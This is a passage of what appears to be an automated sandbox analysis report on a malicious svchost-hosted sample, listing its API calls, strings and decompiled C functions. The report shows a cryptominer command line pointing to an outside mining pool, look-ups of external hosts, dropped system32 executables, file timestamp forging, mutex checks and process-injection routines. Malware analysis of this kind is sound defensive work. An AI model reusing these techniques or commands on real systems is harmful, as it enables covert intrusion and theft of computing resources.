                                                • String ID: $ $FunctionProtocolHost
                                                • API String ID: 941585804-628322727
                                                • Opcode ID: 452e08f4c627bd44be5d0383e12b88e53767731c850b930ff49cd40e562c4220
                                                • Instruction ID: 705e58ae1c5b8a66b09ed0a9b5b0d695f8c2af18b23914a1b2ec82878dfb95c7
                                                • Opcode Fuzzy Hash: 452e08f4c627bd44be5d0383e12b88e53767731c850b930ff49cd40e562c4220
                                                • Instruction Fuzzy Hash: 4531DBB0900718EBEF41DFA4C849BBD7BB4EB09729F184119F5046B2C0C7B675689FA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039979C0 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201filenetworkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • DeleteFileA.KERNELBASE(C:\Windows\system32\dllhostex.exe), ref: 039979D8
                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 03997A4F
                                                • gethostbyname.WS2_32(bk.estonine.com), ref: 03997AE6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteFileFreeLocalgethostbyname
                                                • String ID: $C:\Windows\system32\dllhostex.exe$IPC$bk.estonine.com$z -o p.boreye.com:53 -u new%s -p x -t %d --donate-level=1 --nicehash
                                                • API String ID: 383526064-4089018970
                                                • Opcode ID: 6781d06b66e90758d62475dd67cb5c33d3bdf49918368ba457a057aa2f2acdda
                                                • Instruction ID: 3288c3ce7f6ba3cda9920ddd5ce1e0716efd203408386a9e21436291ae00e6d2
                                                • Opcode Fuzzy Hash: 6781d06b66e90758d62475dd67cb5c33d3bdf49918368ba457a057aa2f2acdda
                                                • Instruction Fuzzy Hash: 2D81C1759142599BEF20EFA8CC40BDEB7B8FF85304F0482DAD8496B241EF715A85CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039921F0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 122threadsleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 195 39921f0-3992209 196 399239a-39923aa call 3997eca 195->196 197 399220f-399227b call 399c970 GetSystemDirectoryA call 3991380 * 2 195->197 206 3992280-399228f 197->206 206->206 207 3992291-399232b call 399c970 CreateThread * 2 206->207 212 399232d 207->212 213 3992366-399236e 207->213 214 3992330-3992353 Sleep 212->214 215 3992370-399237f TerminateThread 213->215 217 3992358-3992364 214->217 215->215 216 3992381-3992399 Sleep 215->216 216->196 217->213 217->214
                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 03992231
                                                • CreateThread.KERNELBASE(00000000,00000000,03997CA0,00000000,00000000,00000000), ref: 039922D9
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00000FB0,00000000,00000000,00000000), ref: 039922F0
                                                • Sleep.KERNELBASE(00007530), ref: 03992335
                                                • TerminateThread.KERNEL32(?,00000000), ref: 03992379
                                                • Sleep.KERNEL32(00001388), ref: 03992386
                                                Strings
                                                • %s\TaskIndexer.exe, xrefs: 03992254
                                                • %s\dllhostex.exe, xrefs: 0399223E
                                                • C:\Windows\system32\dllhostex.exe, xrefs: 03992243
                                                • C:\Windows\system32\TaskIndexer.exe, xrefs: 03992259
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Thread$CreateSleep$DirectorySystemTerminate
                                                • String ID: %s\TaskIndexer.exe$%s\dllhostex.exe$C:\Windows\system32\TaskIndexer.exe$C:\Windows\system32\dllhostex.exe
                                                • API String ID: 2701538180-1491273477
                                                • Opcode ID: 29eb92c7cded3ddaeade4a0ba2f06808cf2c8c18b2f613d2956f49d42034de41
                                                • Instruction ID: ffd7176aacc0609d87024c428aab58aa72cbd6d0fcb072c5d917b62cf5370099
                                                • Opcode Fuzzy Hash: 29eb92c7cded3ddaeade4a0ba2f06808cf2c8c18b2f613d2956f49d42034de41
                                                • Instruction Fuzzy Hash: 91417074A5031CAFEB24EF58DC82FD9B7B8BF49B04F504195E504AF281D7B0AA458F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03991440 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 96filetimeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • CreateFileA.KERNELBASE(C:\Windows\system32\TaskIndexer.exe,C0000000,00000003,00000000,00000003,00000080,00000000,73B75870,00000000), ref: 0399146E
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0399149D
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 039914F2
                                                • CloseHandle.KERNEL32(00000000), ref: 039914FC
                                                • GetFileTime.KERNEL32(00000000,?,?,?), ref: 03991528
                                                • SetFileTime.KERNELBASE(00000000,?,?,?), ref: 03991544
                                                • CloseHandle.KERNEL32(00000000), ref: 03991551
                                                • CloseHandle.KERNEL32(00000000), ref: 03991554
                                                Strings
                                                • \svchost.exe, xrefs: 039914BA
                                                • C:\Windows\system32\TaskIndexer.exe, xrefs: 0399146D
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseHandle$CreateTime$DirectorySystem
                                                • String ID: C:\Windows\system32\TaskIndexer.exe$\svchost.exe
                                                • API String ID: 2251316602-817803103
                                                • Opcode ID: 4f44266579517502c07b73f2fcb982181bfa863ccfdcd6638fda48da6b9bcbfe
                                                • Instruction ID: cb6eb4ba879eac9523ee356c0d517a42af099f6361c21d5ab7a25d28fca7b6fd
                                                • Opcode Fuzzy Hash: 4f44266579517502c07b73f2fcb982181bfa863ccfdcd6638fda48da6b9bcbfe
                                                • Instruction Fuzzy Hash: 5231EB31904118EBDB11EFA8DC41FE9B7BCEB09314F1441DAE649EF1C1EA715A458F90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03997910 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 55synchronizationsleepthreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • Sleep.KERNELBASE(00001388,00000000,73B76490,03997C32), ref: 0399792D
                                                • CreateMutexA.KERNELBASE(00000000,00000001,{B8A7AE22-7F59-CDE5-71F9C2A}), ref: 0399793C
                                                • GetLastError.KERNEL32 ref: 03997948
                                                • ReleaseMutex.KERNEL32(00000000), ref: 03997956
                                                • CloseHandle.KERNEL32(00000000), ref: 0399795D
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0399797B
                                                • TerminateThread.KERNEL32(?,00000000), ref: 03997988
                                                • ReleaseMutex.KERNEL32(00000000), ref: 039979A5
                                                • CloseHandle.KERNEL32(00000000), ref: 039979AC
                                                Strings
                                                • {B8A7AE22-7F59-CDE5-71F9C2A}, xrefs: 03997933
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Mutex$CloseHandleReleaseTerminate$CreateErrorLastProcessSleepThread
                                                • String ID: {B8A7AE22-7F59-CDE5-71F9C2A}
                                                • API String ID: 17202412-3206263115
                                                • Opcode ID: b6ab744b3506d81be805edf72deab3fea9c7b4f0a567e386056c66fa8f69d381
                                                • Instruction ID: b39a3ef211101a0392ff0b27a8a3fa975ba3e955ff407f704bba582f0f3b2fe1
                                                • Opcode Fuzzy Hash: b6ab744b3506d81be805edf72deab3fea9c7b4f0a567e386056c66fa8f69d381
                                                • Instruction Fuzzy Hash: D811DB312183119BEF117FADF90DB99BB68EF45701F1C0056F6019E19ADF748481EB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03991F00 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 55synchronizationsleepthreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • Sleep.KERNELBASE(00001388,73B76490,73B75870,039920EC), ref: 03991F1D
                                                • CreateMutexA.KERNELBASE(00000000,00000001,{F5175396-40C2-0218-278D6EE}), ref: 03991F2C
                                                • GetLastError.KERNEL32 ref: 03991F38
                                                • ReleaseMutex.KERNEL32(00000000), ref: 03991F46
                                                • CloseHandle.KERNEL32(00000000), ref: 03991F4D
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 03991F6B
                                                • TerminateThread.KERNEL32(?,00000000), ref: 03991F78
                                                • ReleaseMutex.KERNEL32(00000000), ref: 03991F95
                                                • CloseHandle.KERNEL32(00000000), ref: 03991F9C
                                                Strings
                                                • {F5175396-40C2-0218-278D6EE}, xrefs: 03991F23
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Mutex$CloseHandleReleaseTerminate$CreateErrorLastProcessSleepThread
                                                • String ID: {F5175396-40C2-0218-278D6EE}
                                                • API String ID: 17202412-3826849957
                                                • Opcode ID: 28765a363163da4be03651786ff2065741cf7770e51dcad31470ff1e46d335eb
                                                • Instruction ID: 6b2aa87072de4bf8d399a55a920eca09a5285430acb1969bdc76008224da7ff0
                                                • Opcode Fuzzy Hash: 28765a363163da4be03651786ff2065741cf7770e51dcad31470ff1e46d335eb
                                                • Instruction Fuzzy Hash: 211108315082119FEF117F6DF90CF99BBA4FF49701F180052F5009E19AEB748040EB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD53EB0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90filememoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 254 6fd53eb0-6fd53edc CreateFileA 255 6fd53ee5-6fd53f15 GetFileSizeEx LocalAlloc 254->255 256 6fd53ede-6fd53ee4 254->256 257 6fd53f17-6fd53f25 CloseHandle 255->257 258 6fd53f26-6fd53f34 255->258 259 6fd53f36 258->259 260 6fd53f6c-6fd53f70 258->260 263 6fd53f40-6fd53f5c ReadFile 259->263 261 6fd53f72-6fd53f8a CloseHandle LocalFree 260->261 262 6fd53f8b-6fd53f98 CloseHandle 260->262 264 6fd53f5e-6fd53f67 263->264 265 6fd53f69 263->265 264->263 264->265 265->260
                                                C-Code - Quality: 64%
                                                			E6FD53EB0(void** __edx, struct _OVERLAPPED** _a4) {
				void** _v8;
				long _v12;
				long _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				void* _t15;
				void* _t17;
				long _t18;
				long _t26;
				void* _t30;
				void** _t31;
				struct _OVERLAPPED** _t35;
				void* _t37;
				long _t38;

				_v8 = __edx;
				_t15 = CreateFileA("C:\Windows\system32\msvcwme.log", 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t30 = _t15;
				if(_t30 != 0xffffffff) {
					_v24 = 0;
					_v20 = 0;
					__imp__GetFileSizeEx(_t30,  &_v24, _t37);
					_t38 = _v24;
					_v16 = _t38;
					_t17 = LocalAlloc(0x40, _t38);
					_t31 = _v8;
					 *_t31 = _t17;
					if(_t17 != 0) {
						_t35 = _a4;
						_t18 = _t38;
						 *_t35 = 0;
						if(_t18 > 0) {
							asm("o16 nop [eax+eax]");
							while(1) {
								_v12 = 0;
								ReadFile(_t30,  *_t31, _t38,  &_v12, 0); // executed
								_t26 = _v12;
								if(_t26 == 0) {
									break;
								}
								 *_t35 =  *_t35 + _t26;
								_t38 = _t38 - _t26;
								_t31 = _v8;
								if(_t38 > 0) {
									continue;
								}
								break;
							}
							_t18 = _v16;
						}
						_push(_t30);
						if( *_t35 == _t18) {
							CloseHandle();
							return 1;
						} else {
							CloseHandle();
							LocalFree( *_v8);
							return 0;
						}
					} else {
						CloseHandle(_t30);
						return 0;
					}
				} else {
					return 0;
				}
			}

















                                                0x6fd53ece
                                                0x6fd53ed1
                                                0x6fd53ed7
                                                0x6fd53edc
                                                0x6fd53ee9
                                                0x6fd53ef2
                                                0x6fd53ef9
                                                0x6fd53eff
                                                0x6fd53f05
                                                0x6fd53f08
                                                0x6fd53f0e
                                                0x6fd53f11
                                                0x6fd53f15
                                                0x6fd53f27
                                                0x6fd53f2a
                                                0x6fd53f2c
                                                0x6fd53f34
                                                0x6fd53f36
                                                0x6fd53f40
                                                0x6fd53f45
                                                0x6fd53f51
                                                0x6fd53f57
                                                0x6fd53f5c
                                                0x00000000
                                                0x00000000
                                                0x6fd53f5e
                                                0x6fd53f60
                                                0x6fd53f62
                                                0x6fd53f67
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd53f67
                                                0x6fd53f69
                                                0x6fd53f69
                                                0x6fd53f6f
                                                0x6fd53f70
                                                0x6fd53f8b
                                                0x6fd53f98
                                                0x6fd53f72
                                                0x6fd53f72
                                                0x6fd53f7d
                                                0x6fd53f8a
                                                0x6fd53f8a
                                                0x6fd53f17
                                                0x6fd53f18
                                                0x6fd53f25
                                                0x6fd53f25
                                                0x6fd53ede
                                                0x6fd53ee4
                                                0x6fd53ee4

                                                APIs
                                                • CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,6FD548F0,?), ref: 6FD53ED1
                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 6FD53EF9
                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 6FD53F08
                                                • CloseHandle.KERNEL32(00000000), ref: 6FD53F18
                                                Strings
                                                • C:\Windows\system32\msvcwme.log, xrefs: 6FD53EC9
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: File$AllocCloseCreateHandleLocalSize
                                                • String ID: C:\Windows\system32\msvcwme.log
                                                • API String ID: 966313076-2357825738
                                                • Opcode ID: ec7267cfa299b142c8de39665283d39146837ad66bb1d54e1a1f64b5b3c008fa
                                                • Instruction ID: 05811bd4f51e2482216953246ca5466d654096e33a2bffe76ccdfe26ab830c78
                                                • Opcode Fuzzy Hash: ec7267cfa299b142c8de39665283d39146837ad66bb1d54e1a1f64b5b3c008fa
                                                • Instruction Fuzzy Hash: 85217175900319EBEF109FA4DC45BEABBB9FF06725F240195F908E7280D771A924DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD55490 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 72registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 94%
                                                			E6FD55490(void* __edi) {
				signed int _v8;
				char _v508;
				void* _v512;
				char _v516;
				int _v520;
				int _v524;
				void* __esi;
				signed int _t19;
				void* _t23;
				unsigned int _t24;
				long _t29;
				long _t36;
				void _t38;
				void _t39;
				signed int _t41;
				void* _t50;
				signed int _t57;

				_t19 =  *0x6fd68008; // 0xc92c5105
				_v8 = _t19 ^ _t57;
				_v512 = 0;
				_v516 = 0;
				E6FD58E90( &_v508, "SYSTEM\\CurrentControlSet\\Services\\", 0x1f4);
				_t23 = 0x6fd6b830;
				_t56 = 0x6fd6b830;
				do {
					_t38 =  *_t23;
					_t23 = _t23 + 1;
				} while (_t38 != 0);
				_t24 = _t23 - 0x6fd6b830;
				_t50 =  &_v508 - 1;
				do {
					_t39 =  *(_t50 + 1);
					_t50 = _t50 + 1;
				} while (_t39 != 0);
				_t41 = _t24 >> 2;
				memcpy(0x6fd6b830 + _t41 + _t41, 0x6fd6b830, memcpy(_t50, 0x6fd6b830, _t41 << 2) & 0x00000003);
				_t29 = RegOpenKeyA(0x80000002,  &_v508,  &_v512); // executed
				if(_t29 == 0) {
					_v520 = 4;
					_t36 = RegQueryValueExA(_v512, "Type", 0,  &_v524,  &_v516,  &_v520); // executed
					_t56 = _t36;
					RegCloseKey(_v512);
					SetLastError(_t36);
				}
				RegCloseKey(_v512); // executed
				return E6FD5599E(_v8 ^ _t57, _t56);
			}




















                                                0x6fd55499
                                                0x6fd554a0
                                                0x6fd554b0
                                                0x6fd554c0
                                                0x6fd554ca
                                                0x6fd554cf
                                                0x6fd554d7
                                                0x6fd554e0
                                                0x6fd554e0
                                                0x6fd554e2
                                                0x6fd554e3
                                                0x6fd554ed
                                                0x6fd554ef
                                                0x6fd554f0
                                                0x6fd554f0
                                                0x6fd554f3
                                                0x6fd554f4
                                                0x6fd554fa
                                                0x6fd55512
                                                0x6fd55519
                                                0x6fd55527
                                                0x6fd5552f
                                                0x6fd55555
                                                0x6fd55561
                                                0x6fd55563
                                                0x6fd55566
                                                0x6fd55566
                                                0x6fd55572
                                                0x6fd55589

                                                APIs
                                                • _strncpy.LIBCMT ref: 6FD554CA
                                                • RegOpenKeyA.ADVAPI32(80000002,?,00000000), ref: 6FD55519
                                                • RegQueryValueExA.KERNELBASE(00000000,Type,00000000,?,00000000,?,?,?,73B009E0), ref: 6FD55555
                                                • RegCloseKey.ADVAPI32(00000000,?,?,73B009E0), ref: 6FD55563
                                                • SetLastError.KERNEL32(00000000,?,?,73B009E0), ref: 6FD55566
                                                • RegCloseKey.KERNELBASE(00000000,?,?,73B009E0), ref: 6FD55572
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: Close$ErrorLastOpenQueryValue_strncpy
                                                • String ID: FunctionProtocolHost$SYSTEM\CurrentControlSet\Services\$Type
                                                • API String ID: 1805282133-3934316727
                                                • Opcode ID: 8911c4ab35d2ff69b697563c05ecba72ea4d6a40dd31ae6f4b136a2c5164c8df
                                                • Instruction ID: 5fcce7f962118d5de224920ab70403c3f092a985bf8298777c301522f3a55fbd
                                                • Opcode Fuzzy Hash: 8911c4ab35d2ff69b697563c05ecba72ea4d6a40dd31ae6f4b136a2c5164c8df
                                                • Instruction Fuzzy Hash: 9D21807190021E9BDF21DB64DC08BEAB7B8EF46318F0401E5E919A7241DB307E989F90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03997110 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 102threadinjectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 03996660: IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 03996677
                                                  • Part of subcall function 03996660: IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 03996695
                                                  • Part of subcall function 03996660: IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 039966A9
                                                  • Part of subcall function 03996660: IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 039966CA
                                                  • Part of subcall function 03996660: IsBadHugeReadPtr.KERNEL32(00000000,000000F8), ref: 039966EC
                                                • GetThreadContext.KERNELBASE(?,00010002,?,00000000,00000000), ref: 0399716E
                                                • SetThreadContext.KERNELBASE(?,00010002), ref: 0399718C
                                                • GetThreadContext.KERNELBASE(?,00010002), ref: 039971C4
                                                • WriteProcessMemory.KERNELBASE(?,00000000,?,00000000,?), ref: 03997215
                                                Strings
                                                • Cannot update ImageBaseAddress!, xrefs: 0399721F
                                                • Failed getting remote PEB address!, xrefs: 03997239
                                                • Cannot update remote EP!, xrefs: 03997240
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HugeRead$ContextThread$MemoryProcessWrite
                                                • String ID: Cannot update ImageBaseAddress!$Cannot update remote EP!$Failed getting remote PEB address!
                                                • API String ID: 2607351119-2699618380
                                                • Opcode ID: df00547ee7b2e4ad936eef959efeb4623ad668ff83ba6f5b551a865db5df0b6b
                                                • Instruction ID: 2d6bf1c198da03598f3fb9b38d67939f61830e71b09a99e4d70b6dba99dafaf3
                                                • Opcode Fuzzy Hash: df00547ee7b2e4ad936eef959efeb4623ad668ff83ba6f5b551a865db5df0b6b
                                                • Instruction Fuzzy Hash: 92318F71611208ABEF20DFA9DC49BEEB7BCEB44650F1440B7E409EA150EF719E84CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD549C0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 66synchronizationCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 57%
                                                			E6FD549C0(void* __edi) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v32;
				void _v932;
				void* __esi;
				signed int _t16;
				void* _t19;
				signed int _t21;
				void* _t25;
				char _t36;
				void* _t46;
				void* _t47;
				void* _t49;
				signed int _t50;
				signed int _t52;
				void* _t53;

				_t52 = (_t50 & 0xfffffff8) - 0x3a0;
				_t16 =  *0x6fd68008; // 0xc92c5105
				_v8 = _t16 ^ _t52;
				asm("movaps xmm0, [0x6fd65fc0]");
				asm("movups [esp+0x398], xmm0");
				_v16 = 0x45463641;
				_v12 = 0x7d4443;
				_t19 = CreateMutexA(0, 1,  &_v32); // executed
				_t46 = _t19;
				_t21 = GetLastError() & 0xffffff00 | _t20 == 0x000000b7;
				if(_t46 == 0) {
					L3:
					_pop(_t47);
					return E6FD5599E(_v8 ^ _t52, _t47);
				} else {
					if(_t21 == 0) {
						_t25 = memcpy( &_v932, "FunctionProtocolHost", 0xe0 << 2);
						_t53 = _t52 + 0xc;
						asm("o16 nop [eax+eax]");
						do {
							_t36 =  *((intOrPtr*)(_t53 + _t25 + 0xc8));
							_t25 = _t25 + 1;
							 *((char*)(_t25 + 0x6fd6b71f)) = _t36;
						} while (_t36 != 0);
						_push(0);
						E6FD54160(_t36,  &_v932); // executed
						_pop(_t49);
						return E6FD5599E(_v8 ^ _t53 + 0x0000000c, _t49);
					} else {
						ReleaseMutex(_t46);
						CloseHandle(_t46);
						goto L3;
					}
				}
			}




















                                                0x6fd549c6
                                                0x6fd549cc
                                                0x6fd549d3
                                                0x6fd549da
                                                0x6fd549ef
                                                0x6fd549f7
                                                0x6fd54a02
                                                0x6fd54a0d
                                                0x6fd54a13
                                                0x6fd54a20
                                                0x6fd54a25
                                                0x6fd54a39
                                                0x6fd54a3c
                                                0x6fd54a4e
                                                0x6fd54a27
                                                0x6fd54a29
                                                0x6fd54a5f
                                                0x6fd54a5f
                                                0x6fd54a65
                                                0x6fd54a70
                                                0x6fd54a70
                                                0x6fd54a77
                                                0x6fd54a7a
                                                0x6fd54a80
                                                0x6fd54a84
                                                0x6fd54a8b
                                                0x6fd54a9d
                                                0x6fd54aa8
                                                0x6fd54a2b
                                                0x6fd54a2c
                                                0x6fd54a33
                                                0x00000000
                                                0x6fd54a33
                                                0x6fd54a29

                                                APIs
                                                • CreateMutexA.KERNELBASE ref: 6FD54A0D
                                                • GetLastError.KERNEL32 ref: 6FD54A15
                                                • ReleaseMutex.KERNEL32(00000000), ref: 6FD54A2C
                                                • CloseHandle.KERNEL32(00000000), ref: 6FD54A33
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: Mutex$CloseCreateErrorHandleLastRelease
                                                • String ID: A6FE$CD}$FunctionProtocolHost
                                                • API String ID: 733076996-4202578170
                                                • Opcode ID: 88844af2816a74fe4f3ea8bfa4d20f1e0e4a9b898b1a1a9fd6bd3a556a7a3685
                                                • Instruction ID: 7aaeb38f06cd7ea81db8e3b343f665841804c9154c4507ff748904a11b0a6f4d
                                                • Opcode Fuzzy Hash: 88844af2816a74fe4f3ea8bfa4d20f1e0e4a9b898b1a1a9fd6bd3a556a7a3685
                                                • Instruction Fuzzy Hash: DA2105315187849BDF618B249415BFF77ECEF87728F045969E88C8B280DB30726887A3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD55590 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 89%
                                                			E6FD55590(void* __ebx, void* __ecx, void* __edi) {
				signed int _v8;
				char _v508;
				void* _v512;
				char _v516;
				void* __esi;
				signed int _t14;
				void _t18;
				void _t19;
				void** _t21;
				long _t24;
				long _t28;
				void* _t30;
				signed int _t31;
				signed int _t35;
				void* _t44;
				void* _t51;
				void* _t52;
				signed int _t53;

				_t14 =  *0x6fd68008; // 0xc92c5105
				_v8 = _t14 ^ _t53;
				_v512 = 0;
				_t30 = __ecx;
				E6FD58E90( &_v508, "SYSTEM\\CurrentControlSet\\Services\\", 0x1f4);
				_t51 = _t30;
				do {
					_t18 =  *_t30;
					_t30 = _t30 + 1;
				} while (_t18 != 0);
				_t31 = _t30 - _t51;
				_t44 =  &_v508 - 1;
				do {
					_t19 =  *(_t44 + 1);
					_t44 = _t44 + 1;
				} while (_t19 != 0);
				_t35 = _t31 >> 2;
				_t21 = memcpy(_t44, _t51, _t35 << 2);
				memcpy(_t51 + _t35 + _t35, _t51, _t31 & 0x00000003);
				_t24 = RegCreateKeyA(0x80000002,  &_v508, _t21); // executed
				_pop(_t52);
				if(_t24 == 0) {
					_v516 = 0x120;
					_t28 = RegSetValueExA(_v512, "Type", 0, 4,  &_v516, 4); // executed
					SetLastError(_t28);
				}
				RegCloseKey(_v512);
				return E6FD5599E(_v8 ^ _t53, _t52);
			}





















                                                0x6fd55599
                                                0x6fd555a0
                                                0x6fd555b1
                                                0x6fd555c1
                                                0x6fd555c3
                                                0x6fd555cb
                                                0x6fd555d0
                                                0x6fd555d0
                                                0x6fd555d2
                                                0x6fd555d3
                                                0x6fd555dd
                                                0x6fd555df
                                                0x6fd555e0
                                                0x6fd555e0
                                                0x6fd555e3
                                                0x6fd555e4
                                                0x6fd555f0
                                                0x6fd555f3
                                                0x6fd55602
                                                0x6fd55609
                                                0x6fd55610
                                                0x6fd55614
                                                0x6fd5561e
                                                0x6fd55638
                                                0x6fd5563f
                                                0x6fd5563f
                                                0x6fd5564b
                                                0x6fd5565e

                                                APIs
                                                • _strncpy.LIBCMT ref: 6FD555C3
                                                • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 6FD55609
                                                • RegSetValueExA.KERNELBASE(?,Type,00000000,00000004,?), ref: 6FD55638
                                                • SetLastError.KERNEL32(00000000), ref: 6FD5563F
                                                • RegCloseKey.ADVAPI32(?), ref: 6FD5564B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
